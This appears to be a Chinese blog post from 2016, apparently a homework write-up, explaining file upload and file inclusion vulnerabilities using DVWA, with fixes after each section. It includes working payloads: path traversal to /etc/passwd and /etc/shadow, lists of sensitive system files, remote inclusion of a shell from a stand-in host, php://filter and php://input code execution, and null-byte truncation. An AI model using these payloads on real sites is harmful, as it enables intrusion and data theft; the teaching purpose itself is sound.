网络安全作业4

title: 文件上传/文件包含漏洞学习

date: 2016-04-25 21:52:19

categories: 安全

tags: Web安全

** 文件上传漏洞 **

在Web程序中,经常需要用到文件上传的功能。如用户或者管理员上传图片,或者其它文件。如果没有限制上传类型或者限制不严格被绕过,就有可能造成文件上传漏洞。如果上传了可执行文件或者网页脚本,就会导致网站被控制甚至服务器沦陷。

常见漏洞原因主要有:

服务器皮配置不当,如开启PUT方式;文本编辑器漏洞;过滤不严上传绕过;解析漏洞等

上传方式

1、解析漏洞

IIS 6.0 解析漏洞:

目录解析:在网站中建立名称为*.asp、.asa格式的文件夹时。其目录下的任意文件都会被当做asp执行。

文件解析:当文件名为.asp;1.jpg 时,也会被当做asp执行。这时因为分号后面的不被解析。

Apache 解析漏洞:

Apache在解析文件时,是从右到左,如果遇到不认识的扩展名,就会继续向左判断。例如1.php.rar,Apache回将其当做php解析。

IIS 7.0/IIS 7.5/ Nginx <0.8.3畸形解析漏洞:当访问http://xxx.xom/1.jpg/1.php时,此时1.php不存在,会将1.jpg当做php来解析。这是因为在php配置中cgi.fi: x_pathinfo这个选项开启时,当访问http://xxx.xom/1.jpg/1.php,1.php不存在,所有php会向前递归解析,于是造成解析漏洞。

2、绕过上传检测

1.有些上传检测是在客户端使用Javascript进行验证,此时可以使用浏览器f12调试功能修改js来绕过。

2.00截断:将普通的webshell文件更改后缀名为jpg,如xxx.jpg然后进行上传。上传时使用burpsuite工具进行拦截。此时在数据中更改文件名为 xxx.php.jpg,然后点击hex编辑16进制。将.jpg中的.的16进制2e更改为00。如图

此时文件名为:

此时,点击go进行上传,最终上传文件为xxx.php

3、服务器配置不当

WebDAV是一种基于 HTTP 1.1协议的通信协议.它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法。使应用程序可直接对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。当WebDAV开启PUT,MOVE,COPY,DELETE方法时,攻击者就可以向服务器上传危险脚本文件。

此时可以使用OPTIONS探测服务器支持的http方法,如果支持PUT,就进行上传脚本文件,在通过MOVE或COPY方法改名。当开启DELETE时还可以删除文件。

参考:http://wiki.wooyun.org/server:httpput

修复上传漏洞

1、白名单验证

在服务器后端,使用白名单进行验证可以有效防御。

2、目录限制

上传后指定目录进行存储,可以防止目录解析漏洞。

3、文件重命名

上传后对文件名进行随机重命名,同时对后缀进行拼接,重新组成一个文件名。

文件包含漏洞

简介

在脚本语言中经常会用到其它的文件,所以都提供了文件包含功能,如果不对可以包含的文件进行限制,就有可能会导致文件包含漏洞。文件包含分为本地文件包含和远程文件包含。

文件包含漏洞可以读取敏感文件,配合文件上传功能可以得到webshell,远程文件包含可以直接远程包含shell。

本地文件包含利用

以PHP为例。PHP中提供了四个文件包含的函数,分别是 include(),include_once(),require(),require_once()

以DVWA为例:

页面中存在3个链接,分别为file1.php,file2.php,file2.php,当打开file1.php时,url链接为http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file1.php

源代码如下

$file = $_GET[ 'page' ];

if( isset( $file ) )

include( $file );

else {

header( 'Location:?page=include.php' );

exit;

}

首先接受f i l e , 当 存 在 时 就 会 包 含 该 页 面 , 否 则 就 跳 转 到 i n c l u d e . p h p , 然 而 我 们 可 以 对 输 入 的 file,当存在时就会包含该页面,否则就跳转到include.php,然而我们可以对输入的file,当存在时就会包含该页面,否则就跳转到include.php,然而我们可以对输入的file进行控制。当输入

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=../../../phpinfo.php时就可以打开phpinfo.php,由此可以读取敏感文件。

如图

并且当包含的文件中有符合php语法规范的语句时,也会将其当做php执行

例如创建一个phpinfo.txt文本,内容为:

<?php

phpinfo()

?>

当包含此文件时也会将其当做php文件执行。当包含非php语法规范的文件时,会打印其源代码。

如果存在文件上传功能,但是没有漏洞时,可以上传一个图片木马,由于没有限制导致无法被解析成为php时,就可以使用文件包含漏洞进行利用。

本地文件包含也可以用来读取敏感文件。

如windows下:

c:\boot.ini

c:\windows\system32\inetsrv\MetaBase.xml

c:\windows\php.ini

c:\windows\my.ini

linux下:

/etc/passwd

/etc/shadow

/var/www/conf/httpd.conf

/var/httpd/conf/php.ini

/var/httpd/conf/httpd.conf

本地文件包含也可以用来包含session文件,日志文件、上传的临时文件,缓存文件等等

远程文件包含利用

当php配置中allow_url_fopen和allow_url_include是打开时,就可以尝试包含远程文件,此时可以直接用来包含webshell等脚本文件。

如:http://127.0.0.1/DVWA/vulnerabilities/fi/?page=http://xxx.com/shell.php,其中http://xxx.com/shell.php为远程shell文件。

同理也可以使用https或者ftp或者http

使用PHP封装协议:

如php流filter http://127.0.0.1/DVWA/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=index.php

此时访问次链接就会得到网页源码的base64代码。

php://input可以执行文件

当访问http://127.0.0.1/DVWA/vulnerabilities/fi/?page=php://input时,使用burpsuite进行截取

在post中提交数据即可,如<?php system('uname -a') ?>,如图

当后缀名被固定时,可以使用截断包含。

如:

$file = $_GET[ 'page' ];

if( isset( $file ) )

include( $file ).".php";

else {

header( 'Location:?page=include.php' );

exit;

}

当包含时只输入文件名,不输入后缀。但此时

可以输入?page=../../../../../../../../../etc/passwd%00

%00会截断。这种方法需要 magic_quotes_gpc=off,PHP小于5.3有效。否则%00会被转义

php小于5.3时,也可以利用最大目录长度的限制可以到达截断,如

../../../../../../(此处省略)/../etc/passd

在linux为4096字节,windows下256字节。

另外可以使用?来实现伪截断

漏洞修复

1、设置allow_url_include和allow_url_fopen为关闭

2、对可以包含的文件进行限制,可以使用白名单的方式,或者设置可以包含的目录,如open_basedir

3、尽量不使用动态包含

相关推荐
东方隐侠安全团队-千里33 分钟前
网安瞭望台第17期:Rockstar 2FA 故障催生 FlowerStorm 钓鱼即服务扩张现象剖析
网络·chrome·web安全
神一样的老师1 小时前
面向高精度网络的时间同步安全管理架构
网络·安全·架构
与海boy2 小时前
CentOS7网络配置,解决不能联网、ping不通外网、主机的问题
linux·网络·网卡
我叫czc3 小时前
【python高级】342-TCP服务器开发流程
服务器·网络·tcp/ip
a_weng083 小时前
CS 144 check6: buiding an IP router
网络·网络协议·计算机网络
終不似少年遊*3 小时前
华为云计算HCIE笔记04
网络·华为云·云计算·学习笔记·hcie·认证·数据中心
红米饭配南瓜汤3 小时前
WebRTC服务质量(09)- Pacer机制(01) 流程概述
网络·音视频·webrtc
上学的小垃圾3 小时前
MPLS基础以及静态LSP的配置
运维·网络·算法
讨喜Dobi3 小时前
OSPF的基本配置
网络
carterslam4 小时前
解决:websocket 1002 connection rejected 426upgrade required
网络·websocket·网络协议